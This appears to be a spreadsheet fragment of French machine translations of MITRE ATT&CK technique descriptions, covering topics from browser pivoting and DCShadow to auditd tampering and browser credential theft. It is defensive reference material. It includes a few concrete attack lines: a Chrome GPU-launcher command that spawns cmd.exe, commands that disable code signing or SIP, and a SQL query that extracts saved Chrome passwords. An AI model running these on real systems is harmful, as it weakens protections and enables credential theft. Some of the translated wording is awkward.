Un autre exemple consiste à faire pivoter le trafic du navigateur de l’adversaire vers le navigateur de l’utilisateur en mettant en place un proxy qui redirigera le trafic Web. Cela ne modifie en rien le trafic de l’utilisateur, et la connexion proxy peut être rompue dès que le navigateur est fermé. L’adversaire prend en charge le contexte de sécurité du processus de navigateur dans lequel le proxy est injecté. Les navigateurs créent généralement un nouveau processus pour chaque onglet ouvert, et les autorisations et les certificats sont séparés en conséquence. Avec ces autorisations, un adversaire pourrait potentiellement accéder à n’importe quelle ressource d’un intranet, telle que [Sharepoint](https://attack.mitre.org/techniques/T1213/002) ou la messagerie Web, qui est accessible via le navigateur et pour laquelle le navigateur dispose d’autorisations suffisantes. Le pivotement du navigateur peut également contourner la sécurité fournie par l’authentification à 2 facteurs. (Citation : manuel de frappe de cobalt)
https://attack.mitre.org/techniques/T1185</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser [Comptes valides](https://attack.mitre.org/techniques/T1078) pour se connecter à un service qui accepte les connexions à distance, tel que telnet, SSH et VNC. L’adversaire peut alors effectuer des actions en tant qu’utilisateur connecté.
Dans un environnement d’entreprise, les serveurs et les postes de travail peuvent être organisés en domaines. Les domaines offrent une gestion centralisée des identités, permettant aux utilisateurs de se connecter à l’aide d’un ensemble d’informations d’identification sur l’ensemble du réseau. Si un adversaire est en mesure d’obtenir un ensemble d’informations d’identification de domaine valides, il peut se connecter à de nombreuses machines différentes à l’aide de protocoles d’accès à distance tels que SSH (Secure Shell) ou RDP (Remote Desktop Protocol). (Citation : SSH Secure Shell)(Citation : Services de bureau à distance TechNet) Ils pourraient également se connecter à des services SaaS ou IaaS accessibles, tels que ceux qui fédérent leurs identités au domaine. 
Les applications légitimes (telles que les [Outils de déploiement de logiciels](https://attack.mitre.org/techniques/T1072) et d’autres programmes administratifs) peuvent utiliser les [Services à distance](https://attack.mitre.org/techniques/T1021) pour accéder aux hôtes distants. Par exemple, Apple Remote Desktop (ARD) sur macOS est un logiciel natif utilisé pour la gestion à distance. ARD exploite un mélange de protocoles, notamment [VNC](https://attack.mitre.org/techniques/T1021/005) pour envoyer les tampons d’écran et de contrôle et [SSH](https://attack.mitre.org/techniques/T1021/004) pour le transfert sécurisé de fichiers. (Citation : Gestion à distance MDM macOS)(Citation : Kickstart Apple Remote Desktop commandes)(Citation : Guide de l’administrateur du bureau à distance Apple 3.3) Les adversaires peuvent abuser d’applications telles que ARD pour exécuter du code à distance et effectuer des mouvements latéraux. Dans les versions de macOS antérieures à la version 10.14, un adversaire peut transformer une session SSH en une session ARD, ce qui lui permet d’accepter les invites TCC (Transparence, Consentement et Contrôle) sans interaction avec l’utilisateur et d’accéder aux données. (Citation : FireEye 2019 Apple Remote Desktop)(Citation : Lockboxx ARD 2019)(Citation : Kickstart Apple Remote Desktop commandes)
https://attack.mitre.org/techniques/T1021</t>
  </si>
  <si>
    <t>Les adversaires peuvent communiquer à l’aide de protocoles de couche application associés à la distribution de courrier électronique pour éviter la détection/le filtrage du réseau en se fondant dans le trafic existant. Les commandes adressées au système distant, et souvent les résultats de ces commandes, seront incorporés dans le trafic de protocole entre le client et le serveur. 
Les protocoles tels que SMTP/S, POP3/S et IMAP qui transportent le courrier électronique peuvent être très courants dans les environnements.  Les paquets produits à partir de ces protocoles peuvent comporter de nombreux champs et en-têtes dans lesquels les données peuvent être dissimulées. Les données peuvent également être dissimulées dans les e-mails eux-mêmes. Un adversaire peut abuser de ces protocoles pour communiquer avec les systèmes sous son contrôle au sein d’un réseau victime tout en imitant le trafic normal et attendu. (Référence : FireEye APT28)
https://attack.mitre.org/techniques/T1071/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent corriger, modifier ou détourner les processus d’authentification dans le cloud liés aux identités des utilisateurs locaux afin de contourner les mécanismes d’authentification classiques, d’accéder aux informations d’identification et d’activer l’accès persistant aux comptes.  
De nombreuses organisations conservent des identités d’utilisateur et d’appareil hybrides qui sont partagées entre les environnements sur site et dans le cloud. Ceux-ci peuvent être entretenus de plusieurs façons. Par exemple, Microsoft Entra ID inclut trois options pour synchroniser les identités entre Active Directory et Entra ID (Citation : Azure AD Hybrid Identity) :
* Synchronisation de hachage de mot de passe (PHS), dans laquelle un compte local privilégié synchronise les hachages de mot de passe de l’utilisateur entre Active Directory et Entra ID, permettant ainsi à l’authentification à Entra ID d’avoir lieu entièrement dans le cloud 
* Authentification directe (PTA), dans laquelle les tentatives d’authentification Entra ID sont transmises à un agent PTA sur site, qui valide les informations d’identification par rapport à Active Directory 
* Active Directory Federation Services (AD FS), dans lequel une relation de confiance est établie entre Active Directory et Entra ID 
AD FS peut également être utilisé avec d’autres plateformes SaaS et cloud telles qu’AWS et GCP, qui transfèrent le processus d’authentification à AD FS et reçoivent un jeton contenant l’identité et les privilèges des utilisateurs hybrides. 
En modifiant les processus d’authentification liés aux identités hybrides, un adversaire peut être en mesure d’établir un accès privilégié persistant aux ressources cloud. Par exemple, les adversaires qui compromettent un serveur local exécutant un agent PTA peuvent injecter une DLL malveillante dans le processus « AzureADConnectAuthenticationAgentService » qui autorise toutes les tentatives d’authentification auprès d’Entra ID et enregistre les informations d’identification de l’utilisateur. (citation : Azure AD Connect pour les membres de l’équipe de lecture)(citation : AADInternals Azure AD On-Prem to Cloud) Dans les environnements utilisant AD FS, un adversaire peut modifier le fichier de configuration « Microsoft.IdentityServer.Servicehost » pour charger une DLL malveillante qui génère des jetons d’authentification pour tout utilisateur avec n’importe quel ensemble de revendications, contournant ainsi l’authentification multifacteur et les stratégies AD FS définies. (Citation : MagicWeb)
Dans certains cas, les adversaires peuvent être en mesure de modifier le processus d’authentification d’identité hybride à partir du cloud. Par exemple, les adversaires qui compromettent un compte d’administrateur général dans un locataire Entra ID peuvent être en mesure d’inscrire un nouvel agent PTA via la console Web, ce qui leur permet de collecter des informations d’identification et de se connecter à l’environnement Entra ID comme n’importe quel utilisateur. (Citation : Mandiant Azure AD Backdoors)
https://attack.mitre.org/techniques/T1556/007</t>
  </si>
  <si>
    <t>Les adversaires peuvent analyser les victimes à la recherche de vulnérabilités qui peuvent être utilisées lors du ciblage. Les analyses de vulnérabilité vérifient généralement si la configuration d’un hôte/d’une application cible (par exemple, le logiciel et la version) s’aligne potentiellement sur la cible d’un exploit spécifique que l’adversaire peut chercher à utiliser.
Ces analyses peuvent également inclure des tentatives plus larges de [Recueillir des informations sur l’hôte victime](https://attack.mitre.org/techniques/T1592) qui peuvent être utilisées pour identifier des vulnérabilités exploitables plus courantes. Les analyses de vulnérabilité récoltent généralement les logiciels en cours d’exécution et les numéros de version via des bannières de serveur, des ports d’écoute ou d’autres artefacts réseau. (Citation : OWASP Vuln Scanning)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[Exploiter le public-Facing Champ d’application](https://attack.mitre.org/techniques/T1190)).
https://attack.mitre.org/techniques/T1595/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser des API cloud pour exécuter des commandes malveillantes. Les API disponibles dans les environnements cloud offrent diverses fonctionnalités et constituent une méthode riche en fonctionnalités pour l’accès programmatique à presque tous les aspects d’un locataire. Ces API peuvent être utilisées par le biais de diverses méthodes telles que les interpréteurs de ligne de commande (CLI), les Cloud Shells dans le navigateur, les modules [PowerShell](https://attack.mitre.org/techniques/T1059/001) tels qu’Azure pour PowerShell (Référence : Microsoft - Azure PowerShell) ou les kits de développement logiciel (SDK) disponibles pour des langages tels que [Python](https://attack.mitre.org/techniques/T1059/006).  
La fonctionnalité de l’API cloud peut permettre un accès administratif à tous les principaux services d’un locataire, tels que le calcul, le stockage, la gestion des identités et des accès (IAM), la mise en réseau et les stratégies de sécurité.
Avec les autorisations appropriées (souvent via l’utilisation d’informations d’identification telles que [Jeton d’accès à l’application](https://attack.mitre.org/techniques/T1550/001) et [Cookie de session Web](https://attack.mitre.org/techniques/T1550/004)), les adversaires peuvent abuser des API cloud pour invoquer diverses fonctions qui exécutent des actions malveillantes. Par exemple, les fonctionnalités CLI et PowerShell peuvent être accessibles via des fichiers binaires installés sur des hôtes hébergés dans le cloud ou sur site, ou accessibles via un shell cloud basé sur un navigateur proposé par de nombreuses plateformes cloud (telles que AWS, Azure et GCP). Ces Cloud Shells sont souvent un environnement unifié packagé permettant d’utiliser des modules CLI et/ou de script hébergés en tant que conteneur dans l’environnement cloud.
https://attack.mitre.org/techniques/T1059/009</t>
  </si>
  <si>
    <t>Les adversaires peuvent rechercher dans des bases de données techniques librement disponibles des informations sur les victimes qui peuvent être utilisées lors du ciblage. Des informations sur les victimes peuvent être disponibles dans des bases de données et des dépôts en ligne, tels que des enregistrements de domaines/certificats ainsi que des collections publiques de données/artefacts de réseau recueillis à partir du trafic et/ou des analyses. (Citation : WHOIS)(Citation : benne à ordures DNS)(Citation : Circl DNS passif)(Citation : Certificat SSL moyen)(Citation : SSLShopper Lookup)(Citation : CDN DigitalShadows)(Citation : Shodan)
Les adversaires peuvent effectuer des recherches dans différentes bases de données ouvertes en fonction des informations qu’ils cherchent à recueillir. Les informations provenant de ces sources peuvent révéler des possibilités pour d’autres formes de reconnaissance (ex : [Hameçonnage pour obtenir des informations](https://attack.mitre.org/techniques/T1598)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[Externe distant Services](https://attack.mitre.org/techniques/T1133) ou [Relation de confiance](https://attack.mitre.org/techniques/T1199)).
https://attack.mitre.org/techniques/T1596</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser des composants du cadre Electron pour exécuter du code malveillant. Le framework Electron héberge de nombreuses applications courantes telles que Signal, Slack et Microsoft Teams. (Citation : Electron 2) Développé à l’origine par GitHub, Electron est un cadre de développement d’applications de bureau multiplateforme qui utilise des technologies Web telles que JavaScript, HTML et CSS. (Citation : Electron 3) Le moteur Chromium est utilisé pour afficher le contenu Web et exécute Node.js le code principal. (Citation : Électron 1)
En raison des mécanismes fonctionnels d’Electron (comme le fait de permettre aux applications d’exécuter des commandes arbitraires), les adversaires peuvent également être en mesure d’exécuter des fonctions malveillantes en arrière-plan potentiellement déguisées en outils légitimes dans le cadre. (Citation : Électron 1) Par exemple, l’utilisation abusive de 'teams.exe' et 'chrome.exe' peut permettre à des adversaires d’exécuter des commandes malveillantes en tant que processus enfants de l’application légitime (par exemple, 'chrome.exe --disable-gpu-sandbox --gpu-launcher="C :\Windows\system32\cmd.exe /c calc.exe'). (Citation : Electron 6-8)
Les adversaires peuvent également exécuter du contenu malveillant en plantant des applications malveillantes [JavaScript](https://attack.mitre.org/techniques/T1059/007) dans les applications Electron. (Citation : Sécurité électronique)
https://attack.mitre.org/techniques/T1218/015</t>
  </si>
  <si>
    <t>Les adversaires peuvent désactiver ou modifier le système d’audit Linux pour masquer les activités malveillantes et éviter d’être détectés. Les administrateurs Linux utilisent le système d’audit Linux pour suivre les informations de sécurité sur un système. Le système d’audit Linux fonctionne au niveau du noyau et conserve des journaux d’événements sur l’activité de l’application et du système, comme les événements de processus, de réseau, de fichier et de connexion, en fonction de règles préconfigurées.
Souvent appelé 'auditd', il s’agit du nom du démon utilisé pour écrire les événements sur le disque et est régi par les paramètres définis dans le fichier de configuration 'audit.conf'. Deux façons principales de configurer les règles de génération de journaux sont d’utiliser l’utilitaire de ligne de commande 'auditctl' et le fichier '/etc/audit/audit.rules', contenant une séquence de commandes 'auditctl' chargées au démarrage. (Citation : Audit du système Red Hat)(Citation : Détection des menaces auditée IzyKnows 2022)
Avec les privilèges root, les adversaires peuvent être en mesure de s’assurer que leur activité n’est pas consignée en désactivant le service système d’audit, en modifiant les fichiers de configuration/règle ou en raccrochant les fonctions de bibliothèque du système d’audit. À l’aide de la ligne de commande, les adversaires peuvent désactiver le service système d’audit en tuant les processus associés au démon « auditd » ou en utilisant « systemctl » pour arrêter le service d’audit. Les adversaires peuvent également accrocher les fonctions du système d’audit pour désactiver la journalisation ou modifier les règles contenues dans les fichiers '/etc/audit/audit.rules' ou 'audit.conf' pour ignorer les activités malveillantes. (Citation : Trustwave Honeypot SkidMap 2023)(Citation : ESET Ebury février 2014)
https://attack.mitre.org/techniques/T1562/012</t>
  </si>
  <si>
    <t>Les adversaires peuvent enregistrer un contrôleur de domaine non autorisé pour permettre la manipulation des données Active Directory. DCShadow peut être utilisé pour créer un contrôleur de domaine non autorisé. DCShadow est une méthode de manipulation des données Active Directory (AD), y compris les objets et les schémas, en enregistrant (ou en réutilisant un enregistrement inactif) et en simulant le comportement d’un contrôleur de domaine. (Citation : Blog DCShadow) Une fois enregistré, un contrôleur de domaine non autorisé peut être en mesure d’injecter et de répliquer les modifications apportées à l’infrastructure AD pour n’importe quel objet de domaine, y compris les informations d’identification et les clés.
L’enregistrement d’un contrôleur de domaine non autorisé implique la création d’un serveur et d’objets nTDSDSA dans la partition de configuration du schéma AD, ce qui nécessite des privilèges d’administrateur (domaine ou local au contrôleur de domaine) ou le hachage KRBTGT. (Citation : Guide Adsecurity Mimikatz)
Cette technique peut contourner la journalisation du système et les moniteurs de sécurité tels que les produits de gestion des informations et des événements de sécurité (SIEM) (puisque les actions entreprises sur un contrôleur de domaine non autorisé peuvent ne pas être signalées à ces capteurs). (Citation : Blog DCShadow) Cette technique peut également être utilisée pour modifier et supprimer la réplication et d’autres métadonnées associées afin d’entraver l’analyse médico-légale. Les adversaires peuvent également utiliser cette technique pour effectuer [l’injection de l’historique SID](https://attack.mitre.org/techniques/T1134/005) et/ou manipuler des objets AD (tels que des comptes, des listes de contrôle d’accès, des schémas) afin d’établir des portes dérobées pour la persistance. (Citation : Blog DCShadow)
https://attack.mitre.org/techniques/T1207</t>
  </si>
  <si>
    <t>Les adversaires peuvent modifier les politiques de signature de code pour permettre l’exécution de code non signé ou auto-signé. La signature de code fournit un niveau d’authenticité sur un programme d’un développeur et une garantie que le programme n’a pas été altéré. Les contrôles de sécurité peuvent inclure des mécanismes d’application pour s’assurer que seul le code valide et signé peut être exécuté sur un système d’exploitation. 
Certains de ces contrôles de sécurité peuvent être activés par défaut, tels que l’application de la signature du pilote (DSE) sous Windows ou la protection de l’intégrité du système (SIP) sur macOS. (Citation : Microsoft DSE juin 2017)(Citation : Apple désactive SIP) D’autres contrôles de ce type peuvent être désactivés par défaut, mais sont configurables via des contrôles d’application, tels que l’autorisation de n’exécuter que des bibliothèques de liens dynamiques (DLL) signées sur un système. Étant donné qu’il peut être utile pour les développeurs de modifier les stratégies d’application de signature par défaut lors du développement et du test d’applications, la désactivation de ces fonctionnalités peut être possible avec des autorisations élevées. (Citation : Pilote Microsoft non signé avril 2017)(Citation : Apple désactive SIP)
Les adversaires peuvent modifier les politiques de signature de code de plusieurs façons, notamment à l’aide d’utilitaires de ligne de commande ou d’interface graphique, de [Modifier le registre](https://attack.mitre.org/techniques/T1112), en redémarrant l’ordinateur en mode de débogage/récupération ou en modifiant la valeur des variables dans la mémoire du noyau. (Citation : Microsoft TESTSIGNING février 2021)(Citation : Apple désactive SIP)(Citation : FireEye HIKIT Rootkit Partie 2)(Citation : GitHub Turla Driver Loader) Parmi les exemples de commandes qui peuvent modifier la politique de signature de code d’un système, citons &lt;code&gt;bcdedit.exe -set TESTSIGNING ON&lt;/code&gt; sous Windows et &lt;code&gt;csrutil disable&lt;/code&gt; sur macOS. (Citation : Microsoft TESTSIGNING février 2021)(Citation : Apple désactive SIP) Selon l’implémentation, la modification réussie d’une politique de signature peut nécessiter le redémarrage du système compromis. De plus, certaines implémentations peuvent introduire des artefacts visibles pour l’utilisateur (par exemple, un filigrane dans le coin de l’écran indiquant que le système est en mode test). Les adversaires peuvent tenter de supprimer ces artefacts. (Citation : F-Secure BlackEnergy 2014)
Pour accéder à la mémoire du noyau afin de modifier des variables liées aux vérifications de signature, telles que la modification &lt;code&gt;g_CiOptions&lt;/code&gt; pour désactiver l’application de signature du pilote, les adversaires peuvent effectuer [Exploitation pour l’élévation de privilèges](https://attack.mitre.org/techniques/T1068) à l’aide d’un pilote signé, mais vulnérable. (Citation : Unit42 AcidBox, juin 2020)(Citation : GitHub Turla Driver Loader)
https://attack.mitre.org/techniques/T1553/006</t>
  </si>
  <si>
    <t>Les adversaires peuvent déployer un conteneur dans un environnement pour faciliter l’exécution ou échapper aux défenses. Dans certains cas, les adversaires peuvent déployer un nouveau conteneur pour exécuter des processus associés à une image ou à un déploiement particulier, tels que des processus qui exécutent ou téléchargent des programmes malveillants. Dans d’autres, un adversaire peut déployer un nouveau conteneur configuré sans règles de réseau, sans limitations d’utilisateurs, etc. pour contourner les défenses existantes dans l’environnement. Dans les environnements Kubernetes, un adversaire peut tenter de déployer un conteneur privilégié ou vulnérable dans un nœud spécifique afin de [S’échapper vers l’hôte](https://attack.mitre.org/techniques/T1611) et d’accéder à d’autres conteneurs s’exécutant sur le nœud. (Citation : AppSecco Kubernetes Namespace Breakout 2020)
Les conteneurs peuvent être déployés de différents manières, par exemple via les API de &lt;code&gt;création&lt;/code&gt; et de &lt;code&gt;démarrage&lt;/code&gt; de Docker ou via une application web telle que le tableau de bord Kubernetes ou Kubeflow. (Citation : API Docker Containers)(Citation : Tableau de bord Kubernetes)(Citation : Kubeflow Pipelines) Dans les environnements Kubernetes, les conteneurs peuvent être déployés via des charges de travail telles que ReplicaSets ou DaemonSets, ce qui permet de déployer des conteneurs sur plusieurs nœuds. (Citation : Gestion de la charge de travail Kubernetes) Les adversaires peuvent déployer des conteneurs basés sur des images malveillantes récupérées ou construites ou à partir d’images bénignes qui téléchargent et exécutent des charges utiles malveillantes au moment de l’exécution. (Citation : Images Aqua Build sur les hôtes)
https://attack.mitre.org/techniques/T1610</t>
  </si>
  <si>
    <t>Les adversaires peuvent interagir avec le registre Windows pour masquer les informations de configuration dans les clés de registre, supprimer des informations dans le cadre du nettoyage ou dans le cadre d’autres techniques pour faciliter la persistance et l’exécution.
L’accès à des zones spécifiques du registre dépend des autorisations du compte, certaines nécessitant un accès de niveau administrateur. L’utilitaire de ligne de commande Windows intégré [Reg](https://attack.mitre.org/software/S0075) peut être utilisé pour la modification du registre local ou à distance. (Référence : Microsoft Reg) D’autres outils peuvent également être utilisés, tels qu’un outil d’accès à distance, qui peut contenir des fonctionnalités permettant d’interagir avec le registre via l’API Windows.
Les modifications du registre peuvent également inclure des actions visant à masquer des clés, telles que l’ajout d’un caractère nul aux noms de touches, qui provoquera une erreur et/ou sera ignoré lors de la lecture via [Reg](https://attack.mitre.org/software/S0075) ou d’autres utilitaires utilisant l’API Win32. (Référence : Microsoft Reghide NOV 2006) Les adversaires peuvent abuser de ces clés pseudo-cachées pour dissimuler des charges utiles/commandes utilisées pour maintenir la persistance. (Citation : TrendMicro POWELIKS AOÛT 2014) (Citation : SpectorOps Hiding Reg juillet 2017)
Le registre d’un système distant peut être modifié pour faciliter l’exécution des fichiers dans le cadre d’un mouvement latéral. Il nécessite que le service de registre distant s’exécute sur le système cible. (Citation : Microsoft Remote) Souvent, des [comptes valides](https://attack.mitre.org/techniques/T1078) sont nécessaires, ainsi qu’un accès aux [partages SMB/Windows Admin](https://attack.mitre.org/techniques/T1021/002) du système distant pour la communication RPC.
https://attack.mitre.org/techniques/T1112</t>
  </si>
  <si>
    <t>Les adversaires peuvent créer ou modifier des démons de lancement pour exécuter des charges utiles malveillantes dans le cadre de la persistance. Les démons de lancement sont des fichiers plist utilisés pour interagir avec Launchd, l’infrastructure de gestion de services utilisée par macOS. L’installation des démons de lancement nécessite des privilèges élevés, est exécutée pour chaque utilisateur d’un système avant la connexion et s’exécute en arrière-plan sans qu’il soit nécessaire d’interagir avec l’utilisateur. Lors du démarrage de l’initialisation de macOS, le processus launchd charge les paramètres des démons système de lancement à la demande à partir des fichiers plist trouvés dans &lt;code&gt;/System/Library/LaunchDaemons/&lt;/code&gt; et &lt;code&gt;/Library/LaunchDaemons/&lt;/code&gt;. Les paramètres de démon de lancement requis incluent une &lt;code&gt;étiquette&lt;/code&gt; pour identifier la tâche, un &lt;code&gt;programme&lt;/code&gt; pour fournir un chemin d’accès à l’exécutable et &lt;code&gt;RunAtLoad&lt;/code&gt; pour spécifier le moment de l’exécution de la tâche. Les démons de lancement sont souvent utilisés pour fournir un accès à des ressources partagées, des mises à jour de logiciels ou des tâches d’automatisation. (Citation : démons de l’agent de lancement AppleDocs)(Citation : Méthodes de persistance des logiciels malveillants Mac)(Citation : launchd Mots-clés pour plists)
Les adversaires peuvent installer un démon de lancement configuré pour s’exécuter au démarrage à l’aide du paramètre &lt;code&gt;RunAtLoad&lt;/code&gt; défini sur &lt;code&gt;true&lt;/code&gt; et du paramètre &lt;code&gt;Program&lt;/code&gt; défini sur le chemin d’accès de l’exécutable malveillant. Le nom du démon peut être déguisé en utilisant un nom provenant d’un système d’exploitation associé ou d’un logiciel inoffensif (c’est-à-dire [Masquerading](https://attack.mitre.org/techniques/T1036)). Lorsque le démon de lancement est exécuté, le programme hérite des autorisations administratives. (Citation : WireLurker)(Citation : Détection des logiciels malveillants OSX)
De plus, les modifications de la configuration du système (telles que l’installation d’un logiciel de gestion de paquets tiers) peuvent rendre des dossiers tels que &lt;code&gt;usr/local/bin accessibles en&lt;/code&gt; écriture à l’échelle mondiale. Ainsi, il est possible que des configurations médiocres permettent à un adversaire de modifier les exécutables référencés par les fichiers plist de Launch Daemon actuels. (Citation : Détournement de LaunchDaemon)(Citation : sentinelone macos persist juin 2019)
https://attack.mitre.org/techniques/T1543/004</t>
  </si>
  <si>
    <t>Un adversaire peut tenter de découvrir l’infrastructure et les ressources disponibles dans un environnement d’infrastructure en tant que service (IaaS). Cela inclut les ressources de service de calcul telles que les instances, les machines virtuelles et les instantanés, ainsi que les ressources d’autres services, notamment les services de stockage et de base de données.
Les fournisseurs de cloud proposent des méthodes telles que des API et des commandes émises par le biais d’interfaces de ligne de commande pour fournir des informations sur l’infrastructure. Par exemple, AWS fournit une API &lt;code&gt;DescribeInstances&lt;/code&gt; au sein de l’API Amazon EC2 qui peut renvoyer des informations sur une ou plusieurs instances d’un compte, l’API &lt;code&gt;ListBuckets&lt;/code&gt; qui renvoie une liste de tous les compartiments appartenant à l’expéditeur authentifié de la demande, l’API &lt;code&gt;HeadBucket&lt;/code&gt; pour déterminer l’existence d’un compartiment ainsi que les autorisations d’accès de l’expéditeur de la demande,  ou l’API &lt;code&gt;GetPublicAccessBlock&lt;/code&gt; pour récupérer la configuration du bloc d’accès pour un compartiment. (citation : Amazon Describe Instance)(Citation : API Amazon Describe Instances)(Citation : AWS Get Public Access Block)(Citation : AWS Head Bucket) De même, l’interface de ligne de commande Cloud SDK de GCP fournit la commande &lt;code&gt;gcloud compute instances list&lt;/code&gt; pour répertorier toutes les instances Google Compute Engine d’un projet (Citation : Google Compute Instances), et la commande CLI &lt;code&gt;az vm list&lt;/code&gt; d’Azure répertorie les détails des machines virtuelles. (Citation : Microsoft AZ CLI) En plus des commandes API, les adversaires peuvent utiliser des outils open source pour découvrir l’infrastructure de stockage dans le cloud via [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003). (Citation : Malwarebytes OSINT Leaky Buckets - Hioureas)
Un adversaire peut énumérer des ressources à l’aide des clés d’accès d’un utilisateur compromis pour déterminer celles qui sont disponibles pour cet utilisateur. (Citation : Expulser IO Evil dans AWS) La découverte de ces ressources disponibles peut aider les adversaires à déterminer leurs prochaines étapes dans l’environnement Cloud, telles que l’établissement de la persistance. (Citation : Mandiant M-Trends 2020)Un adversaire peut également utiliser ces informations pour modifier la configuration afin de rendre le compartiment accessible au public, ce qui permet d’accéder aux données sans authentification. Les adversaires peuvent également utiliser des API de découverte d’infrastructure telles que &lt;code&gt;DescribeDBInstances&lt;/code&gt; pour déterminer la taille, le propriétaire, les autorisations et les listes de contrôle d’accès réseau des ressources de base de données. (citation : AWS décrit les instances de base de données) Les adversaires peuvent utiliser ces informations pour déterminer la valeur potentielle des bases de données et découvrir les conditions requises pour y accéder. Contrairement à [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), cette technique se concentre sur la découverte des composants des services fournis plutôt que sur les services eux-mêmes.
https://attack.mitre.org/techniques/T1580</t>
  </si>
  <si>
    <t>Les adversaires peuvent acquérir des informations d’identification à partir de navigateurs Web en lisant des fichiers spécifiques au navigateur cible. (Citation : Talos Olympic Destroyer 2018) Les navigateurs Web enregistrent généralement des informations d’identification telles que les noms d’utilisateur et les mots de passe afin qu’elles n’aient pas besoin d’être saisies manuellement à l’avenir. Les navigateurs Web stockent généralement les informations d’identification dans un format chiffré au sein d’un magasin d’informations d’identification. Cependant, il existe des méthodes pour extraire les informations d’identification en texte brut des navigateurs Web.
Par exemple, sur les systèmes Windows, les informations d’identification chiffrées peuvent être obtenues à partir de Google Chrome en lisant un fichier de base de données, &lt;code&gt;AppData\Local\Google\Chrome\User Data\Default\Login Data&lt;/code&gt; et en exécutant une requête SQL : &lt;code&gt;SELECT action_url, username_value password_value FROM logins ;&lt;/code&gt;. Le mot de passe en clair peut ensuite être obtenu en transmettant les informations d’identification chiffrées à la fonction &lt;code&gt;d’API Windows CryptUnprotectData&lt;/code&gt;, qui utilise les informations d’identification de connexion mises en cache de la victime comme clé de déchiffrement. (Citation : Microsoft CryptUnprotectData, avril 2018)
Les adversaires ont exécuté des procédures similaires pour les navigateurs Web courants tels que FireFox, Safari, Edge, etc. (Citation : Proofpoint Vega Credential Stealer mai 2018) (Citation : FireEye HawkEye Malware juillet 2017) Windows stocke les informations d’identification Internet Explorer et Microsoft Edge dans des verrouilles d’informations d’identification gérés par le [Windows Credential Manager](https://attack.mitre.org/techniques/T1555/004).
Les adversaires peuvent également acquérir des informations d’identification en recherchant dans la mémoire de processus du navigateur Web des modèles qui correspondent généralement aux informations d’identification. (Citation : GitHub Mimikittenz juillet 2016)
Après avoir acquis des informations d’identification à partir de navigateurs Web, les adversaires peuvent tenter de recycler les informations d’identification sur différents systèmes et/ou comptes afin d’étendre l’accès. Cela peut avoir pour effet de favoriser considérablement l’objectif d’un adversaire dans les cas où les informations d’identification obtenues à partir de navigateurs Web chevauchent des comptes privilégiés (par exemple, un administrateur de domaine).
https://attack.mitre.org/techniques/T1555/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent exécuter leurs propres charges utiles malveillantes en détournant l’ordre de recherche utilisé pour charger d’autres programmes. Étant donné que certains programmes n’appellent pas d’autres programmes en utilisant le chemin d’accès complet, les adversaires peuvent placer leur propre fichier dans le répertoire où se trouve le programme appelant, ce qui oblige le système d’exploitation à lancer leur logiciel malveillant à la demande du programme appelant.
Le détournement de l’ordre de recherche se produit lorsqu’un adversaire abuse de l’ordre dans lequel Windows recherche des programmes qui ne reçoivent pas de chemin d’accès. Contrairement à [Détournement de l’ordre de recherche DLL](https://attack.mitre.org/techniques/T1574/001), l’ordre de recherche diffère selon la méthode utilisée pour exécuter le programme. (Citation : Microsoft CreateProcess) (Citation : Windows NT Command Shell) (Citation : Microsoft WinExec) Cependant, il est courant pour Windows d’effectuer une recherche dans le répertoire du programme initiateur avant de rechercher dans le répertoire système de Windows. Un adversaire qui trouve un programme vulnérable au détournement d’ordre de recherche (c’est-à-dire un programme qui ne spécifie pas le chemin d’accès à un exécutable) peut tirer parti de cette vulnérabilité en créant un programme nommé d’après le programme mal spécifié et en le plaçant dans le répertoire du programme initiateur.
Par exemple, « example.exe » exécute « cmd.exe » avec l’argument de ligne de commande &lt;code&gt;net user&lt;/code&gt;. Un adversaire peut placer un programme appelé « net.exe » dans le même répertoire que example.exe, « net.exe » sera exécuté à la place du réseau de l’utilitaire système Windows. De plus, si un adversaire place un programme appelé « net.com » dans le même répertoire que « net.exe », alors &lt;code&gt;cmd.exe utilisateur net /C&lt;/code&gt; exécutera « net.com » au lieu de « net.exe » en raison de l’ordre des extensions exécutables défini sous PATHEXT. (citation : Propriété de l’environnement Microsoft)
Le détournement d’ordre de recherche est également une pratique courante pour le détournement de charges DLL et est couvert dans [Détournement d’ordre de recherche DLL](https://attack.mitre.org/techniques/T1574/001).
https://attack.mitre.org/techniques/T1574/008</t>
  </si>
  <si>
    <t>Les adversaires peuvent modifier le contenu visuel disponible en interne ou en externe sur un réseau d’entreprise, affectant ainsi l’intégrité du contenu d’origine. Les raisons de [Defigurement](https://attack.mitre.org/techniques/T1491) comprennent l’envoi de messages, l’intimidation ou la revendication (éventuellement fausse) du crédit d’une intrusion. Des images dérangeantes ou offensantes peuvent être utilisées dans le cadre de [Dégradation](https://attack.mitre.org/techniques/T1491) afin de causer un malaise à l’utilisateur ou de faire pression sur le respect des messages d’accompagnement.
https://attack.mitre.org/techniques/T1491</t>
  </si>
  <si>
    <t>Les adversaires peuvent créer des instances cloud dans des régions de service géographiques inutilisées afin d’échapper à la détection. L’accès est généralement obtenu par le biais de comptes compromettants utilisés pour gérer l’infrastructure cloud.
Les fournisseurs de services cloud fournissent souvent une infrastructure dans le monde entier afin d’améliorer les performances, d’assurer la redondance et de permettre aux clients de répondre aux exigences de conformité. Souvent, un client n’utilise qu’un sous-ensemble des régions disponibles et ne surveille pas activement les autres régions. Si un adversaire crée des ressources dans une région inutilisée, il peut être en mesure d’opérer sans être détecté.
Une variante de ce comportement tire parti des différences de fonctionnalités entre les régions cloud. Un adversaire peut utiliser des régions qui ne prennent pas en charge les services de détection avancés afin d’éviter la détection de son activité.
Un exemple d’utilisation par l’adversaire de régions AWS inutilisées est le minage de cryptomonnaie par le biais du [détournement de ressources](https://attack.mitre.org/techniques/T1496), ce qui peut coûter des sommes d’argent considérables aux organisations au fil du temps en fonction de la puissance de traitement utilisée. (Citation : CloudSploit - Régions AWS inutilisées)
https://attack.mitre.org/techniques/T1535</t>
  </si>
  <si>
